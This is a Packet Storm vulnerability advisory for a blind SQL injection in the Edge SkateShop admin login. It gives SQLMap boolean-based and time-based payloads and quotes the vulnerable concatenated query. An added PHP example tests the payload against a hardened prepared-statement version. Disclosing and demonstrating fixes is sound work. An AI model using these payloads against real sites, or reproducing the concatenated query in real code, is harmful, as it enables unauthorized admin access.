Edge SkateShop Blind SQL Injection

2016-12-16T00:00:00
ID PACKETSTORM:140184
Type packetstorm
Reporter Andrea Bocchetti
Modified 2016-12-16T00:00:00

Description

                                        
`# Exploit Title: Edge SkateShop Blind SQL Injection  
# Date: 12/12/2016  
# Exploit Author: Andrea Bocchetti  
# Vendor HomePage: http://www.sourcecodester.com/php/10964/basic-shopping-cartphpmysql.html  
# Software Link: http://www.sourcecodester.com/sites/default/files/download/gebbz/edgesketch.zip  
# Version : n/a  
# Tested on: Kali Linux  
  
# Proof of Concept (Using SQLMap) :  
  
Parameter: admin_username (POST)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause  
Payload: admin_username=-8520' OR 6015=6015-- PORX&admin_password=&admin_login=Scmp  
  
Type: AND/OR time-based blind  
Title: MySQL >= 5.0.12 OR time-based blind  
Payload: admin_username=yzsT' OR SLEEP(5)-- Qgnn&admin_password=&admin_login=Scmp  
  
  
Issue :  
// Login handler from the application: both POST fields are copied  
// unmodified into the SQL string below, which is the injection point.  
if(isset($_POST['admin_login']))  
{  
    $admin_username=$_POST['admin_username'];  
    $admin_password=$_POST['admin_password'];  
  
    // User input is concatenated directly into the query text.  
    $check_admin="select * from admin WHERE admin_username='$admin_username' AND admin_password='$admin_password'";  
  
    $run=mysqli_query($dbcon,$check_admin);  
  
    // Any returned row is treated as a successful login.  
    if(mysqli_num_rows($run))  
    {  
        echo "<script>alert('You're successfully login!')</script>";  
        echo "<script>window.open('Admin/index.php','_self')</script>";  
  
        $_SESSION['admin_username']=$admin_username;  
    }  
    else  
    {  
        echo "<script>alert('Username or password is incorrect!')</script>";  
        echo "<script>window.open('index.php','_self')</script>";  
  
        exit();  
    }  
}  
`
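
The login check above next to a hardened form, as an added example that is not the vendor's or the advisory author's code. It assumes PDO with an in-memory SQLite database in place of the application's MySQL connection, a constructed admin row, and a password column that holds a password_hash() value; the function names are hypothetical.

```php
<?php
// Added example, not code from the application. Assumptions: an in-memory
// SQLite database (via PDO) stands in for the MySQL connection, and the
// admin row and its password are constructed sample data.
declare(strict_types=1);

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE admin (admin_username TEXT PRIMARY KEY, admin_password TEXT)');
$db->prepare('INSERT INTO admin VALUES (?, ?)')
   ->execute(['admin', password_hash('constructed-sample-pw', PASSWORD_DEFAULT)]);

// Query shape from the advisory: input is pasted into the SQL text, so a
// quote in the username ends the string literal and the rest is parsed as SQL.
function login_concatenated(PDO $db, string $user, string $pass): bool
{
    $sql = "select * from admin WHERE admin_username='$user' AND admin_password='$pass'";
    return $db->query($sql)->fetch() !== false;
}

// Hardened form (hypothetical name): the username is bound as a parameter and
// the password is checked with password_verify() against the stored hash, so
// neither value ever becomes part of the SQL text.
function login_prepared(PDO $db, string $user, string $pass): bool
{
    $stmt = $db->prepare('SELECT admin_password FROM admin WHERE admin_username = ?');
    $stmt->execute([$user]);
    $hash = $stmt->fetchColumn();
    return is_string($hash) && password_verify($pass, $hash);
}

// Boolean-based payload quoted in the advisory, sent with an empty password.
$payload = "-8520' OR 6015=6015-- PORX";
$cases = [
    'concatenated + advisory payload' => login_concatenated($db, $payload, ''),
    'prepared + advisory payload'     => login_prepared($db, $payload, ''),
    'prepared + valid credentials'    => login_prepared($db, 'admin', 'constructed-sample-pw'),
    'prepared + wrong password'       => login_prepared($db, 'admin', 'wrong'),
];
foreach ($cases as $label => $accepted) {
    printf("%-34s %s\n", $label, $accepted ? 'login accepted' : 'login rejected');
}
```

In the application itself the same change is made on the existing mysqli connection with mysqli_prepare() and mysqli_stmt_bind_param(), and stored admin passwords would need to be re-hashed with password_hash().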